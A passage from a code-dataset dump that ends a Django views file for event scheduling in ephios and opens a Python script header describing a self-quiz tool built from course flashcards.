shift.start_time.date() - start_date\n # shifts ending on the next day should end on the next day to the new date\n end_offset = shift.end_time.date() - shift.start_time.date()\n current_tz = get_current_timezone()\n shift.end_time = make_aware(\n datetime.combine(\n date.date() + offset + end_offset,\n shift.end_time.astimezone(current_tz).time(),\n )\n )\n shift.meeting_time = make_aware(\n datetime.combine(\n date.date() + offset, shift.meeting_time.astimezone(current_tz).time()\n )\n )\n shift.start_time = make_aware(\n datetime.combine(\n date.date() + offset, shift.start_time.astimezone(current_tz).time()\n )\n )\n shift.event = event\n shifts_to_create.append(shift)\n Shift.objects.bulk_create(shifts_to_create)\n\n messages.success(self.request, _(\"Event copied successfully.\"))\n return redirect(reverse(\"core:event_list\"))\n\n\nclass RRuleOccurrenceView(CustomPermissionRequiredMixin, View):\n permission_required = \"core.add_event\"\n\n def post(self, *args, **kwargs):\n try:\n recurrence = RecurrenceField().clean(self.request.POST[\"recurrence_string\"])\n return HttpResponse(\n json.dumps(\n recurrence.between(\n datetime.now() - timedelta(days=1),\n datetime.now()\n + timedelta(days=730), # allow dates up to two years in the future\n inc=True,\n dtstart=datetime.combine(\n DateField().to_python(self.request.POST[\"dtstart\"]), datetime.min.time()\n ),\n ),\n default=lambda obj: date_format(obj, format=\"SHORT_DATE_FORMAT\"),\n )\n )\n except (TypeError, KeyError, ValidationError):\n return HttpResponse()\n\n\nclass HomeView(LoginRequiredMixin, TemplateView):\n template_name = \"core/home.html\"\n\n\nclass EventNotificationView(CustomPermissionRequiredMixin, SingleObjectMixin, FormView):\n model = Event\n permission_required = \"core.change_event\"\n template_name = \"core/event_notification.html\"\n form_class = EventNotificationForm\n\n def setup(self, request, *args, **kwargs):\n super().setup(request, *args, **kwargs)\n self.object = self.get_object()\n\n def form_valid(self, form):\n action = form.cleaned_data[\"action\"]\n if action == form.NEW_EVENT:\n NewEventNotification.send(self.object)\n elif action == form.REMINDER:\n EventReminderNotification.send(self.object)\n elif action == form.PARTICIPANTS:\n CustomEventParticipantNotification.send(self.object, form.cleaned_data[\"mail_content\"])\n messages.success(self.request, _(\"Notifications sent succesfully.\"))\n return redirect(self.object.get_absolute_url())\n\n\nclass EventCalendarView(TemplateView):\n template_name = \"core/event_calendar.html\"\n\n def get_context_data(self, **kwargs):\n today = datetime.today()\n year = int(self.request.GET.get(\"year\", today.year))\n month = int(self.request.GET.get(\"month\", today.month))\n events = get_objects_for_user(self.request.user, \"core.view_event\", klass=Event)\n shifts = Shift.objects.filter(\n event__in=events, start_time__month=month, start_time__year=year\n )\n calendar = ShiftCalendar(shifts)\n kwargs.setdefault(\"calendar\", mark_safe(calendar.formatmonth(year, month)))\n nextyear, nextmonth = _nextmonth(year, month)\n kwargs.setdefault(\n \"next_month_url\", f\"{reverse('core:event_list')}?year={nextyear}&month={nextmonth}\"\n )\n prevyear, prevmonth = _prevmonth(year, month)\n kwargs.setdefault(\n \"previous_month_url\", f\"{reverse('core:event_list')}?year={prevyear}&month={prevmonth}\"\n )\n return super().get_context_data(**kwargs)\n\n\nclass EventListTypeSettingView(RedirectView):\n def get_redirect_url(self, *args, **kwargs):\n return reverse(\"core:event_list\")\n\n def post(self, request, *args, **kwargs):\n request.session[\"event_list_view_type\"] = request.POST.get(\"event_list_view_type\")\n return self.get(request, *args, **kwargs)\n","sub_path":"ephios/core/views/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":13467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"151229866","text":"#!/usr/bin/env python3\n\n# flashtest.py\n# A hack to let a WGU student iterate through ALL of the C172 flashcards\n# in random order and present a set of \"similar\" multiple choice answers.\n\n\n# 1) click on the flashcard icon for a chapter\n# 2) go into the quiz mode\n# 3) Once the cards have loaded, view page-source\n# 4) look for a textarea box with an ID for flash_content.\n# 5) The flash_content has a jsonified array of all the questions\n#